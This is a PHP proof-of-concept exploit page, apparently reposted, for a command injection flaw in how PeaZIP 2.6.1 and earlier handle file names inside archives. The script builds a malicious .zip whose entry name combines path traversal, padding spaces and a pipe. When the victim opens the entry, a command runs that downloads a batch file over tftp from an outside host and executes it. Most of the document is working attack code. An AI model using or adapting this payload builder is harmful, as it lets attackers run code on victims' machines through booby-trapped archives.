PeaZIP <= 2.6.1 Compressed Filename Command Injection Exploit
来源:http://retrogod.altervista.org/ 作者:pyrokinesis 发布时间:2009-06-08  

<?php
/*
    PeaZIP <= 2.6.1 compressed filename command injection poc exploit
    by Nine:Situations:Group::pyrokinesis
    site: http://retrogod.altervista.org/
    software site: http://peazip.sourceforge.net/

    tested against: peazip 2.5.1, 2.6.1 for Windows

    a pipe vulnerability exists in the way peazip handles file entries,
    prepare the .zip file, open it with peazip, then double click the compressed text file,
    a cmd shell is launched ...
*/

#change, cannot use slashes or backslashes here
$cmd = "tftp 192.168.0.1 GET pyro pyro.bat & pyro.bat";

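class zipfile
{
    /** @var list<string> local file header + compressed payload, one per addFile() call */
    public array $datasec = [];

    /** @var list<string> central directory record per entry, same order as $datasec */
    public array $ctrl_dir = [];

    /** End-of-central-directory signature followed by the two zeroed disk-number fields. */
    public string $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";

    /** Byte offset at which the next local header will start; advanced by addFile(). */
    public int $old_offset = 0;

    /**
     * Convert a Unix timestamp to a packed MS-DOS date/time value (date in the
     * high 16 bits, time in the low 16 bits), as stored in ZIP headers.
     *
     * Uses getdate(), so the result depends on the configured default timezone.
     * A timestamp of 0 means "now". Years before 1980 cannot be represented in
     * the DOS format and are clamped to 1980-01-01 00:00:00.
     *
     * @param int $unixtime seconds since the epoch, or 0 for the current time
     */
    public function unix2DosTime(int $unixtime = 0): int
    {
        $t = $unixtime === 0 ? getdate() : getdate($unixtime);

        if ($t['year'] < 1980) {
            // DOS dates start at 1980; clamp instead of emitting a negative year field.
            $t = ['year' => 1980, 'mon' => 1, 'mday' => 1, 'hours' => 0, 'minutes' => 0, 'seconds' => 0];
        }

        // Layout: yyyyyyy mmmm ddddd | HHHHH MMMMMM SSSSS (seconds at 2-second resolution).
        return (($t['year'] - 1980) << 25)
            | ($t['mon'] << 21)
            | ($t['mday'] << 16)
            | ($t['hours'] << 11)
            | ($t['minutes'] << 5)
            | ($t['seconds'] >> 1);
    }

    /**
     * Append one deflate-compressed entry to the archive.
     *
     * Writes the local file header plus compressed data to $datasec and the
     * matching central-directory record to $ctrl_dir. The entry name is stored
     * verbatim apart from backslash-to-slash normalisation: this class performs
     * no validation of names, so any consumer of archives produced here must
     * treat ".." components, absolute paths and shell metacharacters in entry
     * names as untrusted input.
     *
     * @param string $data uncompressed file contents
     * @param string $name entry name inside the archive
     * @param int    $time Unix mtime for the entry; 0 means "now"
     */
    public function addFile(string $data, string $name, int $time = 0): void
    {
        $name = str_replace('\\', '/', $name);

        // Both headers carry the same little-endian DOS date/time. pack('V') yields
        // exactly the byte order the previous dechex()/eval() round-trip produced,
        // without evaluating generated code and without breaking when dechex()
        // returns fewer than 8 characters (small values indexed past the string end).
        $dosTime = pack('V', $this->unix2DosTime($time));

        $uncLen = strlen($data);
        $crc    = crc32($data);
        // Raw deflate stream (no zlib header/trailer), which is what method 8 expects;
        // equivalent to the old gzcompress() with 2 leading and 4 trailing bytes stripped.
        $zdata  = gzdeflate($data);
        $cLen   = strlen($zdata);

        // Local file header (PK\x03\x04), followed immediately by the compressed data.
        $local  = "\x50\x4b\x03\x04";
        $local .= "\x14\x00";                   // version needed to extract (2.0)
        $local .= "\x00\x00";                   // general purpose bit flag
        $local .= "\x08\x00";                   // compression method: deflate
        $local .= $dosTime;                     // last mod time and date
        $local .= pack('V', $crc);              // crc32
        $local .= pack('V', $cLen);             // compressed size
        $local .= pack('V', $uncLen);           // uncompressed size
        $local .= pack('v', strlen($name));     // file name length
        $local .= pack('v', 0);                 // extra field length
        $local .= $name;
        $local .= $zdata;
        $this->datasec[] = $local;

        // Central directory record (PK\x01\x02) pointing back at the local header.
        $cdrec  = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";                   // version made by
        $cdrec .= "\x14\x00";                   // version needed to extract
        $cdrec .= "\x00\x00";                   // general purpose bit flag
        $cdrec .= "\x08\x00";                   // compression method: deflate
        $cdrec .= $dosTime;                     // last mod time and date
        $cdrec .= pack('V', $crc);              // crc32
        $cdrec .= pack('V', $cLen);             // compressed size
        $cdrec .= pack('V', $uncLen);           // uncompressed size
        $cdrec .= pack('v', strlen($name));     // file name length
        $cdrec .= pack('v', 0);                 // extra field length
        $cdrec .= pack('v', 0);                 // file comment length
        $cdrec .= pack('v', 0);                 // disk number start
        $cdrec .= pack('v', 0);                 // internal file attributes
        $cdrec .= pack('V', 32);                // external file attributes: 'archive' bit set
        $cdrec .= pack('V', $this->old_offset); // relative offset of local header
        $cdrec .= $name;
        $this->ctrl_dir[] = $cdrec;

        // The next local header starts right after this entry's header + data.
        $this->old_offset += strlen($local);
    }

    /**
     * Serialize the archive: all local entries, then the central directory,
     * then the end-of-central-directory record.
     *
     * @return string complete .zip file contents
     */
    public function file(): string
    {
        $data    = implode('', $this->datasec);
        $ctrldir = implode('', $this->ctrl_dir);
        $entries = count($this->ctrl_dir);

        return $data
            . $ctrldir
            . $this->eof_ctrl_dir
            . pack('v', $entries)          // total # of entries "on this disk"
            . pack('v', $entries)          // total # of entries overall
            . pack('V', strlen($ctrldir))  // size of central directory
            . pack('V', strlen($data))     // offset to start of central directory
            . "\x00\x00";                  // .zip file comment length
    }
}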

$zipfile = new zipfile();
$zipfile -> addFile("lol","../../../../../../../\" README.TXT \" ".str_repeat("\x20",0xde - strlen($cmd))."\" | $cmd | .txt");
$dump_buffer = $zipfile -> file();
assert(file_put_contents("9sg.zip",$dump_buffer));
?>


 